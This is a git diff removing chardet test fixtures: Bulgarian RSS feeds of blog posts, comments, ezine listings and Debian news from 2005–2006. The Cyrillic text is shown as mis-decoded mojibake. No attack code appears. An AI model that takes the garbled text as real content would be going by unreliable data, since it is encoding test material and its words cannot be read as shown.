    -ָלא מםכאים פמנלא, ןנוח ךמעמ הא טחןנאעטר עגמ חאגךא ךאךגמ הא טחלטסכע. ־ע הנףדמ לסעמ ג סאיעא למזור הא דכאסףגאר ךאךגמ הא ו סכוהגאשמעמ טל חאהאםטו. ֽו םא ןמסכוהםמ לסעמ - טלא 5 ךאלונט, ס ךמטעמ הא דט סכוהטר.
    -
    -ַא מסעאםאכמעמ: YahooThinkTank.com]]>
    -cybertech corp. (tech.log) -mims -2005-11-08T11:11:13+02:00 -
    - -ֲקונא מעךנטץ, קו צוםעתנתע םא... -http://bpm.cult.bg/medusa/logs/?id=&pid=7520 - - -cybertech corp. (tech.log) -ivgin -2005-10-28T11:10:46+02:00 - - -case modding at its best -Dark... -http://bpm.cult.bg/medusa/logs/?id=&pid=7519 - -Dark Blade
    -האזו לאי למהטםד םו ו ןנאגטכםטע עונלטם ג סכףקא. עמגא סט ו טחךףסעגמ םאןנאגמ.]]>
    - -Dark Blade
    -האזו לאי למהטםד םו ו ןנאגטכםטע עונלטם ג סכףקא. עמגא סט ו טחךףסעגמ םאןנאגמ.]]>
    -cybertech corp. (tech.log) -yme -2005-10-27T13:10:07+02:00 -
    - -ְנו משו הגו דכאסקועא חא... -http://bpm.cult.bg/medusa/logs/?id=&pid=7518 -ףםעמנמג – לאדאחטםתע, ג ךמיעמ ןנמהאגאע גסטקךט וכוךענמםםט הזאהזט םאגוהםתז.
    -
    -www | map]]>
    -ףםעמנמג – לאדאחטםתע, ג ךמיעמ ןנמהאגאע גסטקךט וכוךענמםםט הזאהזט םאגוהםתז.
    -
    -www | map]]>
    -cybertech corp. (tech.log) -ivgin -2005-10-26T18:10:39+02:00 -
    - -5 דכאסא + חא ֳויע... -http://bpm.cult.bg/medusa/logs/?id=&pid=7513 -ֳויע ֱתכדאנט - מבסכףזגאםו, מעםמרוםטו ט ןנמהףךעט, ט משו םךמכךמ + חא Belkin]]> -ֳויע ֱתכדאנט - מבסכףזגאםו, מעםמרוםטו ט ןנמהףךעט, ט משו םךמכךמ + חא Belkin]]> -cybertech corp. (tech.log) -Lucash -2005-10-24T10:10:26+02:00 - - -google*.* -http://bpm.cult.bg/medusa/logs/?id=&pid=7477 -google*.*]]> -google*.*]]> -cybertech corp. (tech.log) -dubka -2005-10-09T11:10:26+02:00 - -
    \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.xml b/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.xml deleted file mode 100644 index 3cd546e..0000000 --- a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.xml +++ /dev/null @@ -1,128 +0,0 @@ - - - - - -*bpm. ezine -http://bpm.cult.bg/ezine/ -*bpm . ezine -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -ֱאכאהאעא חא ִזאך ט ׀מףח -http://bpm.cult.bg/ezine/cinema/?id=712 - - -*bpm . ezine / cinema -Lucash - - - -מכוהא ןמ ץמכטגףהסךט -http://bpm.cult.bg/ezine/etc/?id=711 - - -*bpm . ezine / etc -Zimed - - - -ַהנאגוי מעםמגמ, טכט ךתהו בורו, עתנסטץ עו! -http://bpm.cult.bg/ezine/etc/?id=710 - - -*bpm . ezine / etc -kjano - - - -Crash -http://bpm.cult.bg/ezine/cinema/?id=709 - - -*bpm . ezine / cinema -Lucash - - - -ֿסטץטקםמ םונאחןמכמזוםטו -http://bpm.cult.bg/ezine/etc/?id=708 - - -*bpm . ezine / etc -FKB - - - -ּכאהוזעא טלא הףלאעא -http://bpm.cult.bg/ezine/social/?id=707 - - -*bpm . ezine / social -atomant - - - -ו סעאםא כוךאנ ס קףגסעגמ חא ץףלמנ -http://bpm.cult.bg/ezine/etc/?id=706 - - -*bpm . ezine / etc -FKB - - - -׀אחלטסכט חא נוכטדטמחםמסעעא -http://bpm.cult.bg/ezine/social/?id=705 - - -*bpm . ezine / social -kazobon - - - -טנקמ -http://bpm.cult.bg/ezine/etc/?id=704 - - -*bpm . ezine / etc -FKB - - - -׳טסעוםו ג ץאמסא -http://bpm.cult.bg/ezine/social/?id=703 - - -*bpm . ezine / social -oleole - - - \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/debian.gabrovo.com.news.xml b/chardet/tests/windows-1251-bulgarian/debian.gabrovo.com.news.xml deleted file mode 100644 index 0a08f15..0000000 --- a/chardet/tests/windows-1251-bulgarian/debian.gabrovo.com.news.xml +++ /dev/null @@ -1,69 +0,0 @@ - - - - - - - -Debian ֱתכדאנט: ֽמגטםט -http://debian.gabrovo.com -ֽמגטםט חא Deian םא בתכדאנסךט -bg -Copyright 2001, Nikolay Hristov - - -10 years Debian GNU/Linux (16 august 2003) -http://debian.gabrovo.com/show.php?id=67&tablica=news&sub=ׂולא - - - -Guide to Debian/GNU Linux Desktop Survival -http://debian.gabrovo.com/show.php?id=66&tablica=news&sub=ׂולא - - - -ו מצוכוו כט Debian? -http://debian.gabrovo.com/show.php?id=65&tablica=news&sub=ׂולא - - - -Debian Book חא בתכדאנט (ס טחגוסעםמ חאךתסםוםטו) -http://debian.gabrovo.com/show.php?id=64&tablica=news&sub=ׂולא - - - -ֲאחלמזםמסע חא נודטסענאצט ט המבאגםו םא םמגטםט/סעאעטט -http://debian.gabrovo.com/show.php?id=61&tablica=news&sub=ׂולא - - - -debian-bg mailing list חא ןמענובטעוכטעו םא Debian ג ֱתכדאנט -http://debian.gabrovo.com/show.php?id=60&tablica=news&sub=ׂולא - - - -טנטכטחטנאםו םא Debian 3.0 woody -http://debian.gabrovo.com/show.php?id=59&tablica=news&sub=ׂולא - - - -ּאכךמ HOWTO-עא מעםמסםמ טםסעאכטנאםו םא נאחכטקםט ןאךועט -http://debian.gabrovo.com/show.php?id=58&tablica=news&sub=ׂולא - - - -Security Updates - in.uucpd, ethereal -http://debian.gabrovo.com/show.php?id=57&tablica=news&sub=ׂולא - - - -Security Updates - ס דמכלמ חאךתסםוםטו -http://debian.gabrovo.com/show.php?id=56&tablica=news&sub=ׂולא - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/debian.gabrovo.com.xml b/chardet/tests/windows-1251-bulgarian/debian.gabrovo.com.xml deleted file mode 100644 index f3a95f6..0000000 --- a/chardet/tests/windows-1251-bulgarian/debian.gabrovo.com.xml +++ /dev/null @@ -1,39 +0,0 @@ - - - - - - - -Debian ֱתכדאנט: ֽמגטםט -http://debian.gabrovo.com -ֽמגטםט חא Deian םא בתכדאנסךט -bg -Copyright 2001, Nikolay Hristov - - -אך הא חאהאגאלו גתןנמסט (howto מע Eric Raymond) -http://debian.gabrovo.com/show.php?id=9&tablica=articles&sub=ׂולא - - - -ֿמהמבנגאםו םא סטדףנםמסעעא םא Debian חא unstable/testing -http://debian.gabrovo.com/show.php?id=8&tablica=articles&sub=ׂולא - - - -Mplayer חא Debian - ךתהו ט ךאך? -http://debian.gabrovo.com/show.php?id=6&tablica=articles&sub=ׂולא - - - -אך הא םאןנאגטל debian ןאךוע מע unstable חא potato? -http://debian.gabrovo.com/show.php?id=5&tablica=articles&sub=ׂולא - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/doncho.net.comments.xml b/chardet/tests/windows-1251-bulgarian/doncho.net.comments.xml deleted file mode 100644 index 544108f..0000000 --- a/chardet/tests/windows-1251-bulgarian/doncho.net.comments.xml +++ /dev/null @@ -1,127 +0,0 @@ - - - - - - blog.doncho.net Comments - http://blog.doncho.net - תסקועא זטגמע - Wed, 04 Jan 2006 16:15:10 +0000 - http://wordpress.org/?v=1.5.2 - - - Comment on ִא כמףךמסעטנאלו טכט הא םו כמףךמסעטנאלו? by: ֲכאהמ - http://blog.doncho.net/?p=396#comment-10614 - Wed, 04 Jan 2006 16:03:21 +0000 - http://blog.doncho.net/?p=396#comment-10614 - "You get what you pay for" :-) ֽו גטםאדט ןאנטעו סא םאי-גאזםטע ךנטעונטי. ֽמ קמגוך ענבגא הא טחןנמבגא גסטקךט מןצטט. -ִמבנו המרכט מבנאעםמ ג ִאםט. - “You get what you pay for” :-) ֽו גטםאדט ןאנטעו סא םאי-גאזםטע ךנטעונטי. ֽמ קמגוך ענבגא הא טחןנמבגא גסטקךט מןצטט.
    -ִמבנו המרכט מבנאעםמ ג ִאםט.

    -]]>
    -
    - - Comment on Secure Image: ךנאע םא ךמלוםעאנםט סןאל? by: Velizar - http://blog.doncho.net/?p=347#comment-10602 - Mon, 02 Jan 2006 06:51:23 +0000 - http://blog.doncho.net/?p=347#comment-10602 - ַםאקט ןמ מעםמרוםטו םא SecurityImage Code, והטם גתןנמס - חא ךאךגמ עט ו hidden ןאנאלועתנא -"securityhash"? ִמ ךמכךמעמ סץגאשאל עמגא ו MD5 ץורא םא secirity code, ךמיעמ ענבגא הא סו גתגוהו ט סןמנוה עמגא, ךמועמ ו גתגוכ ‏חונא דמ סנאגםגאר האכט ו גנםמעמ... ֽמ חאשמ ענבגא הא דמ ןמךאחגאר םא סאיעא?? ֿמ ןנטםצטן םו ו כט ןמ-המבנו עמחט ןאנאלועתנ הא דמ "התנזטר" סךנטע ג סוסטעא, ע.ו. גלוסעמ עמגא hidden ןמכו לטסכ, קו ו ןמ-המבנו הא ןמכחגאר $_SERVER['securityhash'] = ... ׁאלמ טהו הו, םו דמ ןנטולאי ךאעמ ךנטעטךא, למזו ט הא םו סתל דמ נאחבנאכ ןנאגטכםמ:) -ׁאיעתע ו דמעטם, ןמחהנאגכוםט! ָ נאחבטנא סו ׳וסעטעא םמגא דמהטםא! -׃סןוץ! - ַםאקט ןמ מעםמרוםטו םא SecurityImage Code, והטם גתןנמס - חא ךאךגמ עט ו hidden ןאנאלועתנא
    -“securityhash”? ִמ ךמכךמעמ סץגאשאל עמגא ו MD5 ץורא םא secirity code, ךמיעמ ענבגא הא סו גתגוהו ט סןמנוה עמגא, ךמועמ ו גתגוכ ‏חונא דמ סנאגםגאר האכט ו גנםמעמ… ֽמ חאשמ ענבגא הא דמ ןמךאחגאר םא סאיעא?? ֿמ ןנטםצטן םו ו כט ןמ-המבנו עמחט ןאנאלועתנ הא דמ “התנזטר” סךנטע ג סוסטעא, ע.ו. גלוסעמ עמגא hidden ןמכו לטסכ, קו ו ןמ-המבנו הא ןמכחגאר $_SERVER[’securityhash’] = … ׁאלמ טהו הו, םו דמ ןנטולאי ךאעמ ךנטעטךא, למזו ט הא םו סתל דמ נאחבנאכ ןנאגטכםמ:)
    -ׁאיעתע ו דמעטם, ןמחהנאגכוםט! ָ נאחבטנא סו ׳וסעטעא םמגא דמהטםא!
    -׃סןוץ!

    -]]>
    -
    - - Comment on ּמזורו by: donangel - http://blog.doncho.net/?p=390#comment-10528 - Sat, 17 Dec 2005 11:05:30 +0000 - http://blog.doncho.net/?p=390#comment-10528 - ְםמםטלםט ענמכמגו לםמדמ... ט גסךאךגט... - ְםמםטלםט ענמכמגו לםמדמ… ט גסךאךגט…

    -]]>
    -
    - - Comment on ּמזורו by: ֳומנדט ֳוםמג - http://blog.doncho.net/?p=390#comment-10527 - Sat, 17 Dec 2005 09:46:50 +0000 - http://blog.doncho.net/?p=390#comment-10527 - ײטעאע: ".. ןנוחטהוםעתע ט הנףדט ןמכטעטקוסךט במךכףך למזוץא הא סט גמחע לטנטחכטגטעו דתחמגו ג םמגט ״ךמהט טכט ױ‏םהאי.." -אעמ דכוהאל ט עט סט חא סתה. ְח אךמ בץ םא לסעמעמ םא ןנוחטהוםעא בטץ עט סתהנאכ חאהםטךא :) - ײטעאע: “.. ןנוחטהוםעתע ט הנףדט ןמכטעטקוסךט במךכףך למזוץא הא סט גמחע לטנטחכטגטעו דתחמגו ג םמגט ״ךמהט טכט ױ‏םהאי..”
    -אעמ דכוהאל ט עט סט חא סתה. ְח אךמ בץ םא לסעמעמ םא ןנוחטהוםעא בטץ עט סתהנאכ חאהםטךא :)

    -]]>
    -
    - - Comment on ףןמם “ֵּ׀ײִֵֵׁ” by: אכטם - http://blog.doncho.net/?p=395#comment-10503 - Tue, 13 Dec 2005 20:40:42 +0000 - http://blog.doncho.net/?p=395#comment-10503 - ָ מע לום בכאדמהאנסךמ! - -ַא והטם ךףןמםטקום ךףןמם, -אכ:)ם - ָ מע לום בכאדמהאנסךמ!

    -

    ַא והטם ךףןמםטקום ךףןמם,
    -אכ:)ם

    -]]>
    -
    - - Comment on ּמזורו by: blog.doncho.net » Blog Archive » ףןמם “ֵּ׀ײִֵֵׁ” - http://blog.doncho.net/?p=390#comment-10500 - Tue, 13 Dec 2005 16:27:11 +0000 - http://blog.doncho.net/?p=390#comment-10500 - [...] ֿנוהט גנולו ןטסאץ חא הוןףעאעסךט ט ןנוחטהוםעסךט לונצוהוסט. ָ חא עמגא ךאך עוחט ןאנט למזורו הא םאץנאםע/סןאסע ץמנא. [...] - […] ֿנוהט גנולו ןטסאץ חא הוןףעאעסךט ט ןנוחטהוםעסךט לונצוהוסט. ָ חא עמגא ךאך עוחט ןאנט למזורו הא םאץנאםע/סןאסע ץמנא. […]

    -]]>
    -
    - - Comment on ֱתכדאנסךמ ִתנזאגםמ ֿמנםמ by: Atanas - http://blog.doncho.net/?p=387#comment-10489 - Sun, 11 Dec 2005 14:22:11 +0000 - http://blog.doncho.net/?p=387#comment-10489 - “ָםפמנלאצטמםםמ מבסכףזגאםו” ו ְִֵ םא ִתנזאגאעא. ָ ךאעמ עאךמגא ץטק םו למדא הא דמ ןנטולא חא קאסעםא פטנלא. ְלא ץטק. ַאשמעמ עמ םו ו. ׂמ ו התנזאגםא פטנלא - ףןנאגכגא סו מע (מבטךםמגוםמ - ןמכטעטקוסךט) התנזאגםט קטםמגםטצט. - -ׁאלמ הא המבאג, קו עאחט סענףךעףנא ו פאךעטקוסךט מכטדמןמכטסע םא ןאחאנא חא טחהאגאםו םא וכוךענמםםט ןמהןטסט, ךמטעמ סענףגאע סךנמלםטעו 72 כג םא דמהטםא. ׀ואכםאעא צוםא םא ףסכףדאעא םו לט ו טחגוסעםא, םמ םו גנגאל הא ו ןמ-גטסמךא מע 10-15 כג. - “ָםפמנלאצטמםםמ מבסכףזגאםו” ו ְִֵ םא ִתנזאגאעא. ָ ךאעמ עאךמגא ץטק םו למדא הא דמ ןנטולא חא קאסעםא פטנלא. ְלא ץטק. ַאשמעמ עמ םו ו. ׂמ ו התנזאגםא פטנלא - ףןנאגכגא סו מע (מבטךםמגוםמ - ןמכטעטקוסךט) התנזאגםט קטםמגםטצט.

    -

    ׁאלמ הא המבאג, קו עאחט סענףךעףנא ו פאךעטקוסךט מכטדמןמכטסע םא ןאחאנא חא טחהאגאםו םא וכוךענמםםט ןמהןטסט, ךמטעמ סענףגאע סךנמלםטעו 72 כג םא דמהטםא. ׀ואכםאעא צוםא םא ףסכףדאעא םו לט ו טחגוסעםא, םמ םו גנגאל הא ו ןמ-גטסמךא מע 10-15 כג.

    -]]>
    -
    - - Comment on ֿמכמגטםךטעו ג ֱתכדאנט by: ֿאכאגנמג - http://blog.doncho.net/?p=391#comment-10487 - Sun, 11 Dec 2005 00:34:45 +0000 - http://blog.doncho.net/?p=391#comment-10487 - ֽו, םו סתל סתדכאסום - ןמדכוהםאעמ מעסענאםט טסעמנטעא םט ו גוסוכא ט ןמףקטעוכםא. ׁאלמטנמםטעא סט ו ןנאגמ םא גסוךט קמגוך ;) - ֽו, םו סתל סתדכאסום - ןמדכוהםאעמ מעסענאםט טסעמנטעא םט ו גוסוכא ט ןמףקטעוכםא. ׁאלמטנמםטעא סט ו ןנאגמ םא גסוךט קמגוך ;)

    -]]>
    -
    - - Comment on Visual’s 2005 בוחןכאעםמ by: donangel - http://blog.doncho.net/?p=394#comment-10485 - Sat, 10 Dec 2005 22:30:29 +0000 - http://blog.doncho.net/?p=394#comment-10485 - @<b>Artem</b>: Thanks a lot for this offtopic, but extremely important comment. I have taken measures to ensure that the users of KeePass PPC can download the files, while I'm trying to resolve my hosting provider's issue with sending mails from PHP scripts. -Needless to say, I am quite pissed off - this is second quite serious flaw in their service (for two years of usage). - @Artem: Thanks a lot for this offtopic, but extremely important comment. I have taken measures to ensure that the users of KeePass PPC can download the files, while I’m trying to resolve my hosting provider’s issue with sending mails from PHP scripts.
    -Needless to say, I am quite pissed off - this is second quite serious flaw in their service (for two years of usage).

    -]]>
    -
    - - Comment on Visual’s 2005 בוחןכאעםמ by: Artem Matevosyan - http://blog.doncho.net/?p=394#comment-10484 - Sat, 10 Dec 2005 20:56:34 +0000 - http://blog.doncho.net/?p=394#comment-10484 - Hello! I'm sorry for the offtopic. I don't understand bulgarian and i'm posting this of I didn't find your mail to contact. I want to download the keepass for PocketPC and I can't the mailer doesn't send me a download link, though it says it hove done so. So could you contact me at Email or ICQ and explain how can I download the POcketPC port of my favourite password manager! Thanks a lot! - Hello! I’m sorry for the offtopic. I don’t understand bulgarian and i’m posting this of I didn’t find your mail to contact. I want to download the keepass for PocketPC and I can’t the mailer doesn’t send me a download link, though it says it hove done so. So could you contact me at Email or ICQ and explain how can I download the POcketPC port of my favourite password manager! Thanks a lot!

    -]]>
    -
    -
    -
    diff --git a/chardet/tests/windows-1251-bulgarian/doncho.net.xml b/chardet/tests/windows-1251-bulgarian/doncho.net.xml deleted file mode 100644 index 2f0557f..0000000 --- a/chardet/tests/windows-1251-bulgarian/doncho.net.xml +++ /dev/null @@ -1,199 +0,0 @@ - - - - - - - blog.doncho.net - http://blog.doncho.net - תסקועא זטגמע - Wed, 04 Jan 2006 10:35:26 +0000 - http://wordpress.org/?v=1.5.2 - bg - - - ִא כמףךמסעטנאלו טכט הא םו כמףךמסעטנאלו? - http://blog.doncho.net/?p=396 - http://blog.doncho.net/?p=396#comments - Tue, 03 Jan 2006 10:33:14 +0000 - donangel - - Daily - ֱתכדאנסךט - ִאםט - http://blog.doncho.net/?p=396 - נאעתך נאחקוע ןמ גמוםםמלף חא כמף-ךמסעטנאםו ֿכמגהטג-״אנכמעוםכףםה - WizzAir, ּאכלמ-ֱףהאןושא

    - -

    ׁעאגאםו, מבכטקאםו, סףענורום עמאכוע: 02:00 - ׂנתדגאםו חא ׁמפט: 02:30 - ֿנטסעטדאםו ג ׁמפט: 04:30 - ׳וךטנאםו ןמכועתע חא ֱףהאןושא: 04:45 - ָחכטעאםו חא ֱףהאןושא: 06:00 - ֿנטסעטדאםו ג ֱףהאןושא: 06:15 (קאסמגאעא נאחכטךא טדנאו עףך, טםאקו ןמכועתע סט [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=396 -
    - - ףןמם “ֵּ׀ײִֵֵׁ” - http://blog.doncho.net/?p=395 - http://blog.doncho.net/?p=395#comments - Tue, 13 Dec 2005 16:27:06 +0000 - donangel - - Daily - ֱתכדאנסךט - http://blog.doncho.net/?p=395 - ֿנוהט גנולו ןטסאץ חא הוןףעאעסךט ט ןנוחטהוםעסךט לונצוהוסט. ָ חא עמגא ךאך עוחט ןאנט למזורו הא םאץנאםע/סןאסע ץמנא.

    - -

    ָחכטחא, קו םו סאלמ םא לום לט ו םאןנאגטכא גןוקאעכוםטו עאחט ןמנוהםא התנזאגםא סגטםשטםא. ָ חא הא םו סו ןמגעאנ עמגא, ףלםט ט מעגמנוםט ץמנא סא נורטכט הא מנדאםטחטנאע ט ןמןףכנטחטנאע ׃ֿ־ֽ. ףןמם ג קוסע םא םארטעו הוןףעאעט, [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=395 -
    - - Visual’s 2005 בוחןכאעםמ - http://blog.doncho.net/?p=394 - http://blog.doncho.net/?p=394#comments - Sat, 10 Dec 2005 20:44:50 +0000 - donangel - - Hacking - Daily - ֱתכדאנסךט - http://blog.doncho.net/?p=394 - ֲקונא ְפאםאסקמ לו סנתדא הא סתל גטהוכ, קו ּאיךנמסמפע סא ןףסםאכט בוחןכאעום האףםכמאה ט נודטסענאצט םא םאי-םמגטעו גונסטט םא סכוהםטעו ןנמהףךעט חא נאחנאבמעךא:

    - -

    Visual Basic 2005 Express Edition [אהנוס םא ISO-עמ חא סגאכםו] -Visual C# 2005 Express Edition [אהנוס םא ISO-עמ חא סגאכםו] -Visual C++ 2005 Express Edition [אהנוס םא ISO-עמ חא סגאכםו] -Visual J# 2005 Express Edition [אהנוס [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=394 -
    - - ׳וסעטע ׀מזהום ִום - http://blog.doncho.net/?p=393 - http://blog.doncho.net/?p=393#comments - Fri, 09 Dec 2005 13:07:31 +0000 - donangel - - Daily - ֱתכדאנסךט - http://blog.doncho.net/?p=393 - ִםוס עאעךמ טלא נמזהום הום. ׁעאגא ןמ-לתהתנ ס משו והםא דמהטםא.

    - -

    ׃סןץ הא דמ קף ןמ עוכופמםא, םמ םו חא התכדמ. ַאשמעמ חםאל, קו סו ןנטעוסםגא, ךמדאעמ סו מבאזהאל אח.

    - -

    ַאעמגא ט עףך טסךאל הא לף ןמזוכא משו גוהםתז הא ו זטג ט חהנאג משו לםמדמ דמהטםט. ִא םאלטנא סטכט הא ןנמשאגא דכףןמסעטעו, ךמטעמ ןנאג [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=393 -
    - - ִאעסךמ סגטהועוכסעגמ חא ןנאגמףןנאגכוםטו - http://blog.doncho.net/?p=392 - http://blog.doncho.net/?p=392#comments - Wed, 07 Dec 2005 18:52:03 +0000 - donangel - - Hacking - Daily - ִאםט - http://blog.doncho.net/?p=392 - אךעמ גוקו ןטסאץ, ךףןטץלו סט ךמכא ג ִאםט. ׁודא בורו נוה םא סגטהועוכסעגמעמ חא ןנאגמףןנאגכוםטו, a.k.a. “ךםטזךא”.

    - -

    ֻמראעא םמגטםא ג סכףקא ו, קו בתכדאנסךאעא ךםטזךא םו גאזט חא ןמסעמםםמ זטגוושטעו ג ִאםט בתכדאנט. ְךמ קמגוך טלא ןמסעמםום אהנוס ג ִאםט, עמ עמי ו הכתזום הא סט סלוםט ךםטזךאעא ג הגףסוהלטקום סנמך מע ןנטסעטדאםועמ סט ג ִאםט [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=392 -
    - - ֿמכמגטםךטעו ג ֱתכדאנט - http://blog.doncho.net/?p=391 - http://blog.doncho.net/?p=391#comments - Sun, 04 Dec 2005 04:36:15 +0000 - donangel - - Daily - http://blog.doncho.net/?p=391 - ֿוע ט ןמכמגטםא ו. ֲ םוהוכ. ו סו חאקףהטעו - עמחט ןתך םו ןטרו סתס סוהלטצט - עמקםמ ג םוהוכ ג ןוע ט ןמכמגטםא כט סו סועט?

    - -

    ֿנטקטםאעא ו ןנמחאטקםא - ֲוסט ט ְםדוכ הםוס חאלטםאגאע חא ֱתכדאנט. ׁ low-cost ןמכוע מע כועטשו ׁעףנףן - ּאכלמ. מועמ ו םא 50 לטםףעט ןתע ס ךמכא מע [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=391 -
    - - ּמזורו - http://blog.doncho.net/?p=390 - http://blog.doncho.net/?p=390#comments - Mon, 28 Nov 2005 11:33:32 +0000 - donangel - - Daily - ֱתכדאנסךט - ֳנמחםט - http://blog.doncho.net/?p=390 - ִםוס קףץ ןמ ְִ׀ָ [mp3] ךאך םארטעו ןנוגוכטךט ט במדמטחבנאםט ןמכטעטצט סט ךףןטכט 15 םמגט, כףךסמחםט ט בנמםטנאםט גמחטכא. ןנוחטהוםעתע (לאכךאעא בףךגא ו ףלטרכוםא) שכ הא סו גמחט ג ךמכא חא ˆ150,000.

    - -

    ֿמ נאהטמעמ םאןנאגטץא ךנאעךא סןנאגךא ךאךגמ למזו הא סו ךףןט גלוסעמ עוחט 15 ךמכט, ךמכךמ המדנאלא חא ףקטכטשאעא טכט ךמכךמ ענאםסןכאםעאצטט חא במכםטעו [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=390 - -
    - - ֳוילתנ - http://blog.doncho.net/?p=389 - http://blog.doncho.net/?p=389#comments - Wed, 16 Nov 2005 19:54:50 +0000 - donangel - - Daily - ֱתכדאנסךט - http://blog.doncho.net/?p=389 - ֽטךמדא םו סתל סו גלוסעגאכ ג עמחט ןנמפטכ ךמלן‏עתנום ןמענובטעוכ. ְלא םטךמדא. ֵ, ט אח ךאעמ גסטקךט ןנמסעמסלתנעםט סתל טדנאכ ןמ 16 קאסא בוח ןנוךתסגאםו ײטגטכטחאצט (ֵהםמ) ןנוח האכוקםאעא 1992-א (לאי בורו). ֽמ מע עמדאגא גסטקךטעו לט דויל-חאנטבגךט בץא ךנאעךמענאיםא כ‏במג. ִמןנוהט הגו סוהלטצט.

    - -

    ֽמ ךאךעמ סו ךאחגא: “ֽטךמדא םו ךאחגאי ‘םטךמדא’” . ׁטדףנםמ ןמגוקועמ [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=389 -
    - - Great Company, E-Boghandel [2] - http://blog.doncho.net/?p=388 - http://blog.doncho.net/?p=388#comments - Wed, 02 Nov 2005 09:51:18 +0000 - donangel - - Daily - English - ִאםט - http://blog.doncho.net/?p=388 - Few weeks ago I shared here some problems with one book delivery. Just few days later I shared my extreme satisfaction after the resolution of the case.

    - -

    Today I understood that I was not mistaken in my evaluation about the services, which SAXO & E-Boghandel provide.

    - -

    You may ask why? The story is quite short: The [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=388 -
    - - Right click slow responce resolved? - http://blog.doncho.net/?p=384 - http://blog.doncho.net/?p=384#comments - Mon, 31 Oct 2005 08:07:09 +0000 - donangel - - Hacking - Daily - English - http://blog.doncho.net/?p=384 - I was experiencing very nasty problem for the past months: when I right click a file on the notebook, it took hell lot of a time to display the context menu. Sometimes it took even more than 30 seconds or so. The most nasty thing (apart from this problem) was the fact that I can’t [...]

    -]]>
    - http://blog.doncho.net/?feed=rss2&p=384 -
    -
    -
    diff --git a/chardet/tests/windows-1251-bulgarian/ecloga.cult.bg.xml b/chardet/tests/windows-1251-bulgarian/ecloga.cult.bg.xml deleted file mode 100644 index 8273610..0000000 --- a/chardet/tests/windows-1251-bulgarian/ecloga.cult.bg.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - - ec-log - http://ecloga.cult.bg/log/index.php - ecloga log - Wed, 04 Jan 2006 16:20:37 GMT - http://backend.userland.com/rss092 - ecloga@mail.bg - ecloga@mail.bg - bg - - - ַאגמי - ׁםמשט ןמןנולטסכץ המסודארםאעא טסעמנט םא עמגא לוסעוםצו ט נורטץ, קו ןמגוקו םלאל םףזהא מע םודמ ג עמחט לף גטה. ׂמגא םו מחםאקאגא, קו ןמגוקו םלא הא טלאל בכמד, שו דמ טלא, םמ שו סו ןנמלוםט, לטסכ קו םו ו המבנא טהו הא ןנמהתכזאגאל, הא סט גמה הםוגםטך ג ןףבכטקםמ ןנמסענאםסעגמ, ןמםו םו עמכךמגא כטקום. ֲסו משו מבלטסכל ךאךתג גטה שו ןנטהמבטו סתהתנזאםטועמ, טלאל םךמט טהוט ט עוןתנגא לטסכ הא דט גםוהנ. מיעמ טסךא הא גמאימנסעגא, םוךא סט דכוהא עוכוגטחט. - http://ecloga.cult.bg/log/index.php?p=251 - - - ֲאנםוםסךמ טחכעמ - ָ עאךא, נוקוםמ-סעמנוםמ, םאגטץ והטם ןנטעוכ ט עמי צתפםא ף םאס הא ןטיםול בטנא ט הא סןט, חא הא למזו סףענטםעא הא סו סעמגאנטל ג ךמלןכוךע םא אגעמדאנאעא. ױגאםאץלו והטם ןנטכטקום אגעמבףס םא ֱטמלוע ט אהסךט םוהמסןאכט (הגא קאסא סתם) סו ןמםוסמץלו ךתל ֲאנםא. ְח סו חאבאגכגאץ ס ו100, ןנטךאחגאץלו חא לנוזמגט טםפנאסענףךעףנט ט ןמסןאץלו. ״וסע קאסא ןמ-ךתסםמ, בץלו םא גאנםוםסךאעא אגעמדאנא ט קאךאץלו טלוםםטךא. ױאןםאץלו ןמ רךולבו ג אלטםאעא, בוח טלוםםטךא, ךמיעמ טחקוחםא ןנט םודמג סתטלוםטך, ט ץףךםאץלו הא טחהטנגאלו דמכלאעא כמךגא. ֿמ ןתע םא כמדטךאעא, כמךגאעא ענבגארו הא סו םאלטנא םאהמכף, עאל בורו, םמ לאכךמ האכוקו ט טלארו המךמגו, אח ןנאגטכםמ ןנוהןמכמזטץ, קו למנסךאעא דנאהטםא סו םאלטנא םאכגמ מע ןתע ןמ ךמיעמ ענתדםאץלו, המבנו קו טלאל ןנוךנאסםמ קףסעגמ חא מנטוםעאצט, עא ףסןץלו הא סו גתנםול םא טחץמהםמ ןמכמזוםטו ןמ הנףד ןתע, חא נאחםממבנאחטו. -ֲוקונעא, וסעוסעגוםמ, ןנולטםא ג ןטוםו ט כוךמ בוחסלטסכוםט סןמנמגו, םמ םטו מבטקאלו הא סןמנטל, ענבגא הא ו חאבאגםמ. ֿנוהט עמגא ףסןץ הא סו גטה ס ּטרמ ט ְםעמםט (האםמ סתל חאןמלםטכ ןנאגטכםמ), זאכךמ קו שץא הא ץמהע םא םךאךגט בףםדאכא. -ׁתבמעאעא ןנמסןאץלו המ נאםםט סכוהמבוה, גסתשםמסע אח סט כודםאץ מךמכמ 7:30 ט םלארו םאקטם. ־סעאםאכאעא קאסע מע הום דמ ןנוךאנאץלו ג ֽמנע (לםמדמ דמעטםמ חאגוהוםטו, וגעטםמ ט ס ןנטעםא דכוהךא), לטהטעו ט צאצאעא בץא םא לםמדמ ןנטכטקםט צוםט ט דנאלאז, רךולבועמ טל בורו גמהםטסעמ, א ןמ והםמ גנולו ןףסםאץא ט ןמן פמכך. ֽאבכ‏האגאץלו וזוהםוגטועמ םא דכאנףסטעו, א המךעמנא לט נאחסםט ךאךגמ ןנוהסעאגכגאע ץולמנמטהטעו, דמגמנטץלו ט חא אןאםהטסטע, עמגא בץא המסעא ןנטולכטגט עולט ג 